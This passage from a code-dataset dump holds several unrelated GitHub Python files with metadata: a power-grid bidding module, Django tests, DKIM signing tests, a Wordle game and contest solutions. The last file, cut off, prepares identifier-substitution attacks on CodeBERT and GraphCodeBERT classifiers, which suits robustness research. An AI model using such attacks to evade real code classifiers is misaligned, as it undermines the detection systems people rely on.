'01.01.1970'\n\n if tdate:\n print('preparing dpgs for', tdate)\n start_time = time.time()\n\n if not nodes:\n nodes = make_nodes(tsid, tdate)\n\n if not lines:\n lines = make_lines(tsid, tdate, nodes)\n\n if not sections:\n sections = make_sections(tsid, tdate, lines)\n\n cs = sql_scripts.ConsumersScript()\n gs = sql_scripts.GeneratorsScript()\n imp_s = sql_scripts.ImpexDpgsScript()\n bs = sql_scripts.BidsScript()\n ks = sql_scripts.KcNodeScript()\n kr = sql_scripts.KgRgeScript()\n rgs = sql_scripts.RastrGenScript()\n rs = sql_scripts.RastrConsumerScript()\n ls = sql_scripts.RastrLoadScript()\n ra = sql_scripts.RastrAreaScript()\n\n con = ora.OracleConnection()\n\n DpgDemand.set_max_bid_prices(con.exec_script(sql_scripts.MaxBidPriceScript().get_query(), {'tsid': tsid}))\n DpgDemand.add_disqualified_data(con.exec_script(sql_scripts.DisqualifiedDataScript().get_query(), {'tsid': tsid}))\n DpgSupply.set_wsum_data(con.exec_script(sql_scripts.WsumgenScript().get_query(), {'tsid': tsid}))\n\n # dpgs = []\n dpgs = DpgList()\n # dpgs_index = {}\n consumers_index = {}\n dpg_areas_index = {}\n\n @ora.process_cursor(con, cs, {'tsid': tsid})\n def process_consumers(new_row, dpg_list):\n dpg_list.add_consumer(new_row)\n\n @ora.process_cursor(con, gs, {'tsid': tsid})\n def process_generators(new_row, dpg_list):\n dpg_list.add_generator(new_row)\n\n @ora.process_cursor(con, imp_s, {'tsid': tsid})\n def process_impex_dpgs(new_row, dpg_list):\n dpg_list.add_impex(new_row)\n\n @ora.process_cursor(con, rgs, {'tsid': tsid})\n def process_generator_data(new_row, dpg_list):\n dpg_id = new_row[rgs['dpg_id']]\n if dpg_list[dpg_id]:\n dpg_list[dpg_id].add_generator_data(new_row)\n\n @ora.process_cursor(con, bs, {'tsid': tsid})\n def process_bids(new_row, dpg_list):\n dpg_id = new_row[bs['dpg_id']]\n if dpg_list[dpg_id]:\n dpg_list[dpg_id].add_bid_data(new_row)\n\n @ora.process_cursor(con, ks, {'tsid': tsid})\n def process_k_distr(new_row, dpg_list):\n dpg_id = new_row[ks['dpg_id']]\n if dpg_list[dpg_id]:\n dpg_list[dpg_id].add_k_distr_data(new_row)\n\n @ora.process_cursor(con, kr, {'tsid': tsid})\n def process_k_rge_distr(new_row, dpg_list):\n dpg_id = new_row[kr['dpg_id']]\n if dpg_list[dpg_id]:\n dpg_list[dpg_id].add_k_distr_data(new_row)\n\n @ora.process_cursor(con, rs, {'tsid': tsid})\n def process_rastr_consumer(new_row, dpg_list):\n consumer_code = new_row[rs['consumer_code']]\n if dpg_list.get_consumer_by_code(consumer_code):\n dpg_list.get_consumer_by_code(consumer_code).add_consumer_data(new_row)\n\n @ora.process_cursor(con, ls, {'tsid': tsid})\n def process_rastr_load(new_row, dpg_list):\n consumer_code = new_row[ls['consumer_code']]\n if dpg_list.get_consumer_by_code(consumer_code):\n dpg_list.get_consumer_by_code(consumer_code).add_load_data(new_row)\n\n @ora.process_cursor(con, ra, {'tsid': tsid})\n def process_rastr_area(new_row, dpg_list):\n area = new_row[ra['area']]\n if dpg_list.get_consumer_by_area(area):\n dpg_list.get_consumer_by_area(area).add_area_data(new_row)\n\n # print('getting consumer DPGs')\n # process_consumers(dpgs)\n # process_rastr_consumer(dpgs)\n # process_rastr_load(dpgs)\n # process_rastr_area(dpgs)\n # for dpg in dpgs:\n # dpg.attach_nodes(nodes)\n #\n # print('getting supplier DPGs')\n # process_generators(dpgs)\n\n print('getting impex DPGs')\n process_impex_dpgs(dpgs)\n for i, d in enumerate(dpgs):\n d.attach_sections(sections)\n update_progress((i + 1) / len(dpgs))\n\n # R = random.randint(0, len(dpgs))\n # DPGCODE = dpgs[R].code\n # DPGID = dpgs[R].id\n\n # print('getting generator information')\n # process_generator_data(dpgs)\n\n\n\n # print('getting bid information')\n # process_bids(dpgs)\n # #\n # # print('getting k_distr information')\n # # process_k_distr(dpgs)\n # # process_k_rge_distr(dpgs)\n #\n # print(\"distributing consumer's bids\")\n # for i, d in enumerate(dpgs):\n # d.finalize_data()\n # d.distribute_bid()\n # d.prepare_generator_data()\n # d.prepare_fixedgen_data(nodes)\n # d.attach_to_fed_station(dpgs)\n # update_progress((i + 1) / len(dpgs))\n #\n # for i, d in enumerate(dpgs):\n # d.prepare_fixedcon_data()\n # update_progress((i + 1) / len(dpgs))\n # print('done!')\n # [print(d, i) for d, i in zip(dpgs, dpgs_index)]\n\n print('---------- %s seconds -----------' % (time.time() - start_time))\n\n # print(R, DPGCODE, dpgs[R].consumer_code, len(dpgs[dpgs_index[DPGID]].get_distributed_bid()))\n # [print(d) for d in dpgs[dpgs_index[907]].get_distributed_bid()]\n return dpgs, sections\n\n\ndef make_distributed_bids(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n eq_db_supplies = []\n eq_db_demands = []\n eq_db_impexbids = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n eq_db_supplies += dpg.get_distributed_bid()\n elif isinstance(dpg, DpgDemand):\n eq_db_demands += dpg.get_distributed_bid()\n elif isinstance(dpg, DpgImpex):\n eq_db_impexbids += dpg.get_distributed_bid()\n return eq_db_supplies, eq_db_demands, eq_db_impexbids\n\n\ndef make_fixedgen_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n fixedgen = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n fixedgen += dpg.get_fixedgen_data()\n return fixedgen\n\n\ndef make_generator_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n eq_db_generators = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n eq_db_generators += dpg.get_prepared_generator_data()\n return eq_db_generators\n\n\ndef make_fixedcon_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n fixedcon = []\n for dpg in dpgs:\n if isinstance(dpg, DpgDemand):\n fixedcon += dpg.get_fixedcon_data()\n return fixedcon\n\n\ndef make_eq_db_nodes_pq(tsid, tdate=''):\n nodes = make_nodes(tsid, tdate)\n dpgs = make_dpgs(tsid, tdate, nodes)\n\n eq_db_nodes_pq = []\n eq_db_nodes_pq_index = {}\n ns_pq = {'p_cons_minus_gen': 3, 'cons': 8, 'gen': 9}\n\n eq_db_nodes_pv = []\n eq_db_nodes_pv_index = {}\n ns_pv = {'p_gen': 3, 'cons': 12, 'gen': 13}\n\n eq_db_nodes_sw = []\n\n fis = {'hour': 0, 'node_code': 1, 'value': 2}\n for i, node in enumerate(nodes):\n node_pq_index = {}\n node_pv_index = {}\n fixedimpex = node.get_impex_data()\n\n for hour, node_hour in enumerate(node.hour_data):\n if not node_hour.is_node_on():\n continue\n fixedimpex_hour = [f for f in fixedimpex if f[fis['hour']] == hour]\n if len(fixedimpex_hour) > 1:\n raise Exception('wrong fixedimpex count for node %i' % node.node_code)\n if fixedimpex_hour:\n impex_value = fixedimpex_hour[0][fis['value']]\n else:\n impex_value = 0\n\n if node_hour.type == 1:\n node_pq_index[hour] = len(eq_db_nodes_pq)\n eq_db_nodes_pq.append([\n hour, node.node_code, node.voltage_class, impex_value, node_hour.qn, 1.4 * node.voltage_class,\n 0.75 * node.voltage_class, node_hour.qg, max(impex_value, 0), -1 * min(impex_value, 0)\n ])\n elif node_hour.type > 1:\n node_pv_index[hour] = len(eq_db_nodes_pv)\n eq_db_nodes_pv.append([\n hour, node.node_code, node.voltage_class, impex_value, max(node_hour.max_q, -10000),\n min(node_hour.min_q, 10000), 1.4 * node.voltage_class, 0.75 * node.voltage_class,\n node_hour.qn, node_hour.qg, node_hour.type, node.fixed_voltage, -1 * min(impex_value, 0),\n max(impex_value, 0)\n ])\n elif node_hour.is_balance_node():\n relative_voltage = (node.fixed_voltage if node.fixed_voltage else node.nominal_voltage)\\\n / node.voltage_class\n eq_db_nodes_sw.append((\n hour, node.node_code, node.voltage_class, -node_hour.pn, relative_voltage, 0,\n max(node_hour.max_q, -10000), min(node_hour.min_q, 10000)\n ))\n\n if node_pq_index:\n eq_db_nodes_pq_index[node.node_code] = node_pq_index\n if node_pv_index:\n eq_db_nodes_pv_index[node.node_code] = node_pv_index\n\n # fixedgen = []\n fgs = {'hour': 0, 'node_code': 2, 'value': 4}\n for i, dpg in enumerate(dpgs):\n if isinstance(dpg, DpgSupply):\n for fixedgen in dpg.get_fixedgen_data():\n node_code = fixedgen[fgs['node_code']]\n hour = fixedgen[fgs['hour']]\n if node_code in eq_db_nodes_pq_index.keys():\n ni = eq_db_nodes_pq_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pq[ni[hour]][ns_pq['p_cons_minus_gen']] += fixedgen[fgs['value']]\n eq_db_nodes_pq[ni[hour]][ns_pq['gen']] += -fixedgen[fgs['value']]\n\n elif node_code in eq_db_nodes_pv_index.keys():\n ni = eq_db_nodes_pv_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pv[ni[hour]][ns_pv['p_gen']] += fixedgen[fgs['value']]\n eq_db_nodes_pv[ni[hour]][ns_pv['gen']] += fixedgen[fgs['value']]\n\n # fixedcon = []\n fcs = {'hour': 0, 'node_code': 1, 'value': 3}\n for i, dpg in enumerate(dpgs):\n if isinstance(dpg, DpgDemand):\n for fixedcon in dpg.get_fixedcon_data():\n node_code = fixedcon[fcs['node_code']]\n hour = fixedcon[fcs['hour']]\n if node_code in eq_db_nodes_pq_index.keys():\n ni = eq_db_nodes_pq_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pq[ni[hour]][ns_pq['p_cons_minus_gen']] += fixedcon[fcs['value']]\n eq_db_nodes_pq[ni[hour]][ns_pq['cons']] += fixedcon[fcs['value']]\n\n elif node_code in eq_db_nodes_pv_index.keys():\n ni = eq_db_nodes_pv_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pv[ni[hour]][ns_pv['p_gen']] += fixedcon[fcs['value']]\n eq_db_nodes_pv[ni[hour]][ns_pv['cons']] += -fixedcon[fcs['value']]\n\n # fixedimpex = []\n # fis = {'hour': 0, 'node_code': 1, 'value': 2}\n # for n in nodes:\n # fixedimpex += n.get_impex_data()\n\n return eq_db_nodes_pq, eq_db_nodes_pv, eq_db_nodes_sw\n\n\ndef make_sections_impex_data(tsid, tdate=''):\n dpgs, sections = make_dpgs(tsid, tdate)\n sections_impex = []\n for s in sections:\n sections_impex += s.get_section_impex_data()\n return sections_impex\n\n\ndef make_sections_lines_impex_data(tsid, tdate=''):\n dpgs, sections = make_dpgs(tsid, tdate)\n sections_lines_impex_data = []\n for s in sections:\n sections_lines_impex_data += s.get_section_lines_impex_data()\n return sections_lines_impex_data\n\n\ndef make_sections_data(tsid, tdate=''):\n dpgs, sections = make_dpgs(tsid, tdate)\n sections_data = []\n for s in sections:\n sections_data += s.get_section_data()\n return sections_data\n\n\ndef make_sections_lines_data(tsid, tdate=''):\n dpgs, sections = make_dpgs(tsid, tdate)\n sections_lines_data = []\n for s in sections:\n sections_lines_data += s.get_section_lines_data()\n return sections_lines_data\n\n\n\n\n\n\n\n\n\n\n","repo_name":"konstantinov90/calc_factory","sub_path":"eq_db/distributed_bids.py","file_name":"distributed_bids.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43684472563","text":"list1 = [10, 20, 30, 40, 50, 60] #created list 1\nlist2 = [10, 20, 30, 50, 40, 60,60] #created list 2\n\nif len(list1)==len(list2):\n list1.sort() #sorting the list\n list2.sort() #soritng the list\n for i in range(0,len(list1)): #starting the of iteration of size of list\n if list1[i]!=list2[i]:\n \n print(\"list are not same\") \n break #using break to stop if both are not same\n if len(list1)-1==i : #since we have started with 0 , hence we to subtract 1\n print(\"both are same\")\nelse:\n print(\"list are same\")\n","repo_name":"TheAkshrCompany/Python","sub_path":"comparinglist.py","file_name":"comparinglist.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71441126056","text":"from django.test import TestCase, Client\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.core.cache import cache\nimport os\n\nfrom .models import Post, Group, Comment\nfrom PIL import Image\n\n\nUser = get_user_model()\n\n\ndef test_context(self, response):\n self.assertEqual(response.context['page'][0].text, 'No fate')\n self.assertEqual(response.context['page'][0].author, self.user)\n self.assertEqual(response.context['page'][0].group, self.group)\n\n\nclass TestProfile(TestCase):\n def setUp(self):\n self.client = Client()\n self.client2 = Client()\n self.user = User.objects.create_user(\n username='sarah', email='s.conor@mail.ru', password='234567Abc'\n )\n self.group = Group.objects.create(\n title='test_group',\n slug='test_group',\n description='test'\n )\n self.client.force_login(self.user)\n self.post = self.client.post(reverse('new_post'), {\n 'text': 'No fate',\n 'group': 1\n })\n self.user2 = User.objects.create_user(\n username='john', email='j.conor@mail.ru', password='123456Abc'\n )\n self.client2.force_login(self.user2)\n response = self.client2.get(reverse(\n 'profile_follow',\n args=[self.user.username]\n ),\n follow=True\n )\n cache.clear()\n\n def test_profile(self):\n response = self.client.get(reverse(\n 'profile',\n args=[self.user.username]\n ))\n self.assertEqual(response.status_code, 200)\n\n# Авторизованный пользователь может опубликовать пост (new)\n def test_new_post(self):\n self.assertEqual(Post.objects.all().count(), 1)\n first_post = Post.objects.first()\n self.assertEqual(first_post.text, 'No fate')\n self.assertEqual(first_post.author, self.user)\n self.assertEqual(first_post.group, self.group)\n\n# После публикации поста новая запись появляется на главной странице сайта\n def test_post_index(self):\n response = self.client.get(reverse('index'))\n test_context(self, response)\n\n# на персональной странице пользователя (profile)\n def test_post_profile(self):\n response = self.client.get(reverse(\n 'profile',\n args=[self.user.username]\n ))\n test_context(self, response)\n\n# и на отдельной странице поста (post)\n def test_post_page(self):\n response = self.client.get(reverse(\n 'post',\n args=[\n self.user.username,\n Post.objects.first().id\n ]\n ))\n self.assertEqual(response.context['post'].text, 'No fate')\n self.assertEqual(response.context['post'].author, self.user)\n self.assertEqual(response.context['post'].group, self.group)\n\n# Авторизованный пользователь может отредактировать свой пост\n# и его содержимое изменится на всех связанных страницах\n def test_post_edit(self):\n self.client.force_login(self.user)\n new_post = self.client.post(reverse(\n 'post_edit',\n args=[\n self.user.username,\n Post.objects.first().id\n ]\n ),\n {'text': 'T1000 - loh'}\n )\n response = self.client.get(reverse(\n 'profile',\n args=[self.user.username]\n ))\n self.assertEqual(response.context['posts'][0].text, 'T1000 - loh')\n response = self.client.get(reverse(\n 'profile',\n args=[self.user.username]\n ))\n self.assertEqual(response.context['posts'][0].group, None)\n response = self.client.get(reverse('index'))\n self.assertEqual(response.context['page'][0].text, 'T1000 - loh')\n response = self.client.get(reverse(\n 'post',\n args=[\n self.user.username,\n Post.objects.first().id\n ]\n ))\n self.assertEqual(response.context['post'].text, 'T1000 - loh')\n\n def test_cache_index_page(self):\n self.client.force_login(self.user)\n self.post = self.client.post(reverse('new_post'), {\n 'text': 'test2',\n 'group': 1\n })\n cache.clear()\n response = self.client.get(reverse('index'))\n self.assertIn('test2', response.content.decode())\n self.post = self.client.post(reverse('new_post'), {\n 'text': 'test3',\n 'group': 1\n })\n response = self.client.get(reverse('index'))\n self.assertNotIn('test3', response.content.decode())\n cache.clear()\n response = self.client.get(reverse('index'))\n self.assertIn('test3', response.content.decode())\n\n# Неавторизованный посетитель не может опубликовать пост\n# (его редиректит на страницу входа)\n def test_post(self):\n self.client.logout()\n response = self.client.post(\n reverse('new_post'),\n {\n 'text': 'Astala vista',\n 'group': 1\n },\n follow=True\n )\n self.assertEqual(\n response.redirect_chain,\n [('/auth/login/?next=/new/', 302)]\n )\n self.assertEqual(Post.objects.all().count(), 1)\n\n def test_404(self):\n response = self.client.get(reverse(\n 'post',\n args=[\n 'nouser',\n 99999\n ]\n ))\n self.assertEqual(response.status_code, 404)\n\n# Авторизованный пользователь может подписываться на других\n# пользователей и удалять их из подписок\n# Новая запись пользователя появляется в ленте тех, кто на него\n# подписан и не появляется в ленте тех, кто не подписан на него.\n def test_following(self):\n response = self.client2.get(reverse(\n 'profile',\n args=[self.user.username]\n ))\n self.assertEqual(True, response.context['following'])\n response = self.client2.get(reverse('follow_index'))\n test_context(self, response)\n\n def test_unfollowing(self):\n response = self.client2.get(reverse(\n 'profile_unfollow',\n args=[self.user.username]\n ),\n follow=True\n )\n self.assertEqual(False, response.context['following'])\n response = self.client2.get(reverse('follow_index'))\n self.assertEqual(0, len(response.context['page']))\n\n# Только авторизированный пользователь может комментировать посты\n def test_comment_not_authorized_user(self):\n self.client2.logout()\n response = self.client2.post(reverse(\n 'add_comment',\n args=[self.user.username, Post.objects.first().id],\n ),\n {'text': 'Hi, mom'},\n follow=True\n )\n self.assertEqual(\n response.redirect_chain,\n [(\n f'/auth/login/?next=/{self.user.username}'\n f'/{Post.objects.first().id}/comment/',\n 302\n )]\n )\n self.assertEqual(Comment.objects.all().count(), 0)\n\n\nclass TestImages(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = User.objects.create_user(\n username=\"sarah\",\n email='s.conor@mail.ru',\n password='234567Abc'\n )\n self.client.force_login(self.user)\n self.group = Group.objects.create(title='testgroup', slug='testgroup')\n self.post = Post.objects.create(\n text='Test post',\n author=self.user,\n group=self.group)\n\n def test_images(self):\n img = Image.new('RGB', (100, 200))\n img.save('media/image.jpg')\n with open('media/image.jpg', 'rb') as img:\n response = self.client.post(reverse(\n 'post_edit',\n args=[\n self.user.username,\n Post.objects.first().id\n ]\n ),\n {\n 'text': 'Test post with img',\n 'image': img\n },\n follow=True\n )\n self.assertIn(' n:\n break\n if nj > m:\n break\n add = (path[k] * p[n-i-1][k-1]) % mod\n add = (add * dp[i][j]) % mod\n dp[ni][nj] += add\n dp[ni][nj] =(dp[ni][nj]) % mod\n #dp[ni][nj] += (((dp[i][j] * path[k]) % mod) * p[n - i - 1][k - 1]) % mod\n #dp[ni][nj] %= mod\n for k in range(2,l+1):\n ni = k + i\n nj = k + j\n if ni > n:\n break\n if nj > m:\n break\n add = (cycle[k] * p[n-i-1][k-1]) % mod\n add = (add * dp[i][j]) % mod\n dp[ni][nj] += add\n dp[ni][nj] =(dp[ni][nj]) % mod\n #dp[ni][nj] += (((dp[i][j] * cycle[k]) % mod) * p[n - i - 1][k - 1]) % mod\n #dp[ni][nj] %= mod\n return dp[n][m]\n\nans = (f(n,m,l)-f(n,m,l-1)) % mod\nprint(int(ans)) ","repo_name":"momomorgentau/code","sub_path":"atcoder/abc/abc180/f_unbranched.py","file_name":"f_unbranched.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6058154127","text":"import os.path\nimport tempfile\nimport unittest\n\nimport dkim\nimport dkim.dknewkey as dknewkey\n\ndef read_data(path):\n \"\"\"Get the content of the given test data file.\"\"\"\n\n with open(path, 'rb') as f:\n return f.read()\n\n\nclass TestSignAndVerify(unittest.TestCase):\n \"\"\"End-to-end signature and verification tests with a generated key.\"\"\"\n\n def setUp(self):\n message_dir = os.path.join(os.path.dirname(__file__), 'data', \"test.message\")\n self.message = read_data(message_dir)\n self.ed25519_dns_key_file = \"\"\n self.rsa_dns_key_file = \"\"\n \n\n def test_generate_verifies_new_RSA_key(self):\n #Create temporary dir\n tmpdir = tempfile.TemporaryDirectory()\n keydir = tmpdir.name\n rsa_key_file = os.path.join(keydir, \"dkim.rsa.key\")\n self.rsa_dns_key_file = os.path.join(keydir, \"dkim.rsa.key.pub.txt\")\n #Generate a rsa key\n dknewkey.GenRSAKeys(rsa_key_file, False)\n dknewkey.ExtractRSADnsPublicKey(rsa_key_file, self.rsa_dns_key_file, False)\n #Load the key\n rsakey = read_data(rsa_key_file)\n #Test signature with the newely generated key \n for header_algo in (b\"simple\", b\"relaxed\"):\n for body_algo in (b\"simple\", b\"relaxed\"):\n sig = dkim.sign(\n self.message, b\"test\", b\"example.com\", rsakey,\n canonicalize=(header_algo, body_algo))\n res = dkim.verify(sig + self.message, dnsfunc=self.dnsfuncRSA)\n self.assertTrue(res)\n tmpdir.cleanup()\n\n\n def test_generate_verifies_Ed25519_key(self):\n #Create temporary dir\n tmpdir = tempfile.TemporaryDirectory()\n keydir = tmpdir.name\n ed25519_key_file = os.path.join(keydir, \"dkim.ed25519.key\")\n self.ed25519_dns_key_file = os.path.join(keydir, \"dkim.ed25519.key.pub.txt\")\n #Generate a ed25519 key\n pkt = dknewkey.GenEd25519Keys(ed25519_key_file, False)\n dknewkey.ExtractEd25519PublicKey(self.ed25519_dns_key_file, pkt, False)\n #Load the key\n ed25519key = read_data(ed25519_key_file)\n #Test signature with the newely generated key \n for header_algo in (b\"simple\", b\"relaxed\"):\n for body_algo in (b\"simple\", b\"relaxed\"):\n sig = dkim.sign(\n self.message, b\"test1\", b\"example.com\", ed25519key,\n signature_algorithm=b'ed25519-sha256',\n canonicalize=(header_algo, body_algo))\n res = dkim.verify(sig + self.message, dnsfunc=self.dnsfuncED25519)\n self.assertTrue(res)\n tmpdir.cleanup()\n\n\n def dnsfuncRSA(self, domain, timeout=5):\n _dns_responses = {\n 'test._domainkey.example.com.': read_data(self.rsa_dns_key_file),\n }\n try:\n domain = domain.decode('ascii')\n except UnicodeDecodeError:\n return None\n self.assertTrue(domain in _dns_responses,domain)\n return _dns_responses[domain]\n\n def dnsfuncED25519(self, domain, timeout=5):\n _dns_responses = {\n 'test1._domainkey.example.com.': read_data(self.ed25519_dns_key_file),\n }\n try:\n domain = domain.decode('ascii')\n except UnicodeDecodeError:\n return None\n self.assertTrue(domain in _dns_responses,domain)\n return _dns_responses[domain]\n\n \n\ndef test_suite():\n from unittest import TestLoader\n return TestLoader().loadTestsFromName(__name__)\n","repo_name":"jauderho/dkimpy","sub_path":"dkim/tests/test_dkim_generate.py","file_name":"test_dkim_generate.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"36916045276","text":"import random\nimport re\nfrom word_work import get_all_words, get_possible_words \n\nyellow_box = u\"\\U0001f7e8\"\ngreen_box = u\"\\U0001f7e9\"\ngrey_box = u\"\\u2b1c\"\n\ndef pick_winning_word():\n words = get_possible_words()\n random.seed()\n i = random.randrange(len(words))\n return words[i]\n\ndef read_guess():\n valid = False\n print(\"Please guess a 5 letter word:\")\n while not valid:\n word = input()\n if len(word) != 5:\n print(\"Word must be 5 letter long\")\n elif word not in get_all_words():\n print(\"Not a valid word\")\n else:\n valid = True\n return word\n\ndef print_result(word, states):\n string = \"\"\n for i, l in enumerate(word):\n if states[i] == 'correct':\n string += '\\033[42m' + l + '\\033[0m'\n elif states[i] == 'present':\n string += '\\033[43m' + l + '\\033[0m'\n else:\n string += l\n return string\n\ndef get_pattern(results):\n text = f\"Wordle {len(results)}/6\\n\"\n for r in results:\n #print(f\"row: {r}\")\n for c in r[1]:\n if c == 'correct':\n text += green_box\n elif c == 'present':\n text += yellow_box\n else:\n text += grey_box\n text += '\\n'\n return text\n\n\ndef compare_guess(winning_word, guess):\n results = ['absent'] * 5\n letters = []\n \n for i, c in enumerate(guess):\n if winning_word[i] == c:\n results[i] = 'correct'\n else:\n letters.append(winning_word[i])\n\n #print(f\"remaining letters {letters}\")\n for i, c in enumerate(guess):\n if results[i] == 'absent':\n if c in letters:\n results[i] = 'present'\n letters.remove(c)\n\n return results\n\ndef result_done(result):\n for r in result:\n if r != 'correct':\n return False\n return True\n\ndef main():\n winning_word = pick_winning_word()\n #print(f\"Winning word is {winning_word}\")\n\n won = False\n\n for i in range(6):\n guess = read_guess()\n result = compare_guess(winning_word, guess)\n print(print_result(guess, result))\n if result_done(result):\n won = True\n print(\"Congrats!!!!\")\n break\n\n if not won:\n print(f\"Failed, the word was {winning_word}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"benpayne/wordle_bot","sub_path":"flask-server/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"72207867818","text":"'''\n假设按照升序排序的数组在预先未知的某个点上进行了旋转。\n\n( 例如,数组 [0,0,1,2,2,5,6] 可能变为 [2,5,6,0,0,1,2] )。\n\n编写一个函数来判断给定的目标值是否存在于数组中。若存在返回 true,否则返回 false。\n\n示例 1:\n\n输入: nums = [2,5,6,0,0,1,2], target = 0\n输出: true\n示例 2:\n\n输入: nums = [2,5,6,0,0,1,2], target = 3\n输出: false\n进阶:\n\n这是 搜索旋转排序数组 的延伸题目,本题中的 nums  可能包含重复元素。\n这会影响到程序的时间复杂度吗?会有怎样的影响,为什么?\n'''\nfrom typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> bool:\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) >> 1\n value = nums[mid]\n if target == value:\n return True\n if nums[left] < value: # mid值在左边部分\n if nums[left] <= target < value:\n right = mid - 1\n else:\n left = mid + 1\n elif nums[right] > value: # mid值在右边部分\n if value < target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n else: # 去重\n if nums[left] == value:\n left += 1\n if nums[right] == value:\n right -= 1\n\n return False\n\n\nif __name__ == '__main__':\n nums = [1, 0, 1, 1, 1]\n target = 0\n sol = Solution()\n print(sol.search(nums, target))\n","repo_name":"Asunqingwen/LeetCode","sub_path":"Cookbook/Array/搜索旋转排序数组 II.py","file_name":"搜索旋转排序数组 II.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19921246746","text":"import copy\nimport os\nimport json\nimport sys\nimport torch\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nsys.path.append('../../../')\nsys.path.append('../../../python_parser')\nfrom python_parser.run_parser import get_identifiers, remove_comments_and_docstrings, get_example, get_example_batch\nfrom transformers import RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer, RobertaForMaskedLM\nfrom model import CodeBERT, GraphCodeBERT\nfrom run import CodeBertTextDataset, GraphCodeBertTextDataset\nfrom utils import _tokenize\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n\nMODEL_CLASSES = {\n 'roberta': (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)\n}\n\n\ndef get_embeddings(code, variables, tokenizer_mlm, codebert_mlm, args):\n new_code = copy.deepcopy(code)\n chromesome = {}\n for i in variables:\n chromesome[i] = ''\n new_code = get_example_batch(new_code, chromesome, \"c\")\n _, _, code_tokens = get_identifiers(remove_comments_and_docstrings(new_code, \"c\"), \"c\")\n processed_code = \" \".join(code_tokens)\n words, sub_words, keys = _tokenize(processed_code, tokenizer_mlm)\n sub_words = [tokenizer_mlm.cls_token] + sub_words[:args.block_size - 2] + [tokenizer_mlm.sep_token]\n input_ids_ = torch.tensor([tokenizer_mlm.convert_tokens_to_ids(sub_words)])\n with torch.no_grad():\n embeddings = codebert_mlm.roberta(input_ids_.to('cuda'))[0]\n\n return embeddings\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--all_data_file\", default=None, type=str,\n help=\"All data file (a text file).\")\n parser.add_argument(\"--cache_dir\", default=\"\", type=str,\n help=\"Optional directory to store the pre-trained models downloaded from s3 (instread of the default one)\")\n parser.add_argument(\"--config_name\", default=\"\", type=str,\n help=\"Optional pretrained config name or path if not the same as model_name_or_path\")\n parser.add_argument(\"--model_name\", default=\"\", type=str,\n help=\"model name.\")\n\n args = parser.parse_args()\n args.device = torch.device(\"cuda\")\n args.output_dir = '../code/saved_models'\n args.model_type = 'roberta'\n args.eval_batch_size = 64\n args.block_size = 512\n args.store_path = './dataset/%s_all_subs.json' % args.model_name\n\n if args.model_name == 'codebert':\n args.tokenizer_name = 'microsoft/codebert-base-mlm'\n args.model_name_or_path = 'microsoft/codebert-base-mlm'\n args.base_model = 'microsoft/codebert-base-mlm'\n elif args.model_name == 'graphcodebert':\n args.code_length = 448\n args.data_flow_length = 64\n args.tokenizer_name = 'microsoft/graphcodebert-base'\n args.model_name_or_path = 'microsoft/graphcodebert-base'\n args.base_model = 'microsoft/graphcodebert-base'\n\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path,\n cache_dir=args.cache_dir if args.cache_dir else None)\n config.num_labels = 1\n tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name,\n do_lower_case=False,\n cache_dir=args.cache_dir if args.cache_dir else None)\n if args.block_size <= 0:\n args.block_size = tokenizer.max_len_single_sentence\n args.block_size = min(args.block_size, tokenizer.max_len_single_sentence)\n if args.model_name_or_path:\n model = model_class.from_pretrained(args.model_name_or_path,\n from_tf=bool('.ckpt' in args.model_name_or_path),\n config=config,\n cache_dir=args.cache_dir if args.cache_dir else None)\n else:\n model = model_class(config)\n\n if args.model_name == 'codebert':\n model = CodeBERT(model, config, tokenizer, args)\n all_dataset = CodeBertTextDataset(tokenizer, args, args.all_data_file)\n elif args.model_name == 'graphcodebert':\n model = GraphCodeBERT(model, config, tokenizer, args)\n all_dataset = GraphCodeBertTextDataset(tokenizer, args, args.all_data_file)\n checkpoint_prefix = 'checkpoint-best-acc/%s_model.bin' % args.model_name\n output_dir = os.path.join(args.output_dir, '{}'.format(checkpoint_prefix))\n model.load_state_dict(torch.load(output_dir))\n model.to(args.device)\n\n codebert_mlm = RobertaForMaskedLM.from_pretrained(args.base_model)\n codebert_mlm.to(args.device)\n tokenizer_mlm = RobertaTokenizer.from_pretrained(args.base_model)\n\n source_codes = []\n with open(args.all_data_file) as f:\n for line in 